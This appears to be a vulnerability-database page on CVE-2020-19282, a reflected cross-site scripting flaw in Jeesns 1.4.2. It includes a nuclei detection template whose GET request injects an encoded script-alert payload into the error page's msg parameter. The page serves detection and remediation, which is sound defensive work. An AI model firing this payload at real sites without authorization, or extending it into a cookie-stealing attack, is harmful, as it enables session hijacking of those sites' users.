Lucene search
K

Jeesns 1.4.2 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Jeesns 1.4.2 is vulnerable to cross-site scripting, allowing attackers to execute arbitrary web scripts via a crafted payload in the error message's text field. Exploiting this vulnerability could lead to session hijacking, defacement, or theft of sensitive data

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-19282
10 Sep 202102:30
circl
CNNVD
JEESNS 跨站脚本漏洞
9 Sep 202100:00
cnnvd
CNVD
JEESNS Reflective Cross-Site Scripting Vulnerability (CNVD-2021-74052)
10 Sep 202100:00
cnvd
CVE
CVE-2020-19282
9 Sep 202122:10
cve
Cvelist
CVE-2020-19282
9 Sep 202122:10
cvelist
EUVD
EUVD-2020-11187
7 Oct 202500:30
euvd
NVD
CVE-2020-19282
9 Sep 202123:15
nvd
Prion
Cross site scripting
9 Sep 202123:15
prion
Positive Technologies
PT-2021-10322
9 Sep 202100:00
ptsecurity
RedhatCVE
CVE-2020-19282
22 May 202517:04
redhatcve
Rows per page
id: CVE-2020-19282

info:
  name: Jeesns 1.4.2 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/zchuanzhao/jeesns/issues/11
    - https://www.seebug.org/vuldb/ssvid-97940
    - https://nvd.nist.gov/vuln/detail/CVE-2020-19282
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-19282
    cwe-id: CWE-79
    epss-score: 0.03162
    epss-percentile: 0.86425
    cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jeesns
    product: jeesns
    fofa-query: title="jeesns"
  tags: cve2020,cve,jeesns,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a1703a8c817c68b7f5921877c92bb77af6ddb5a3df380cb43c439ce9445c07d40221009a0f1d9f0612c1e12535816fb22055ee182caf93b3cc149b747ecfcbcc7070b1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.03162
41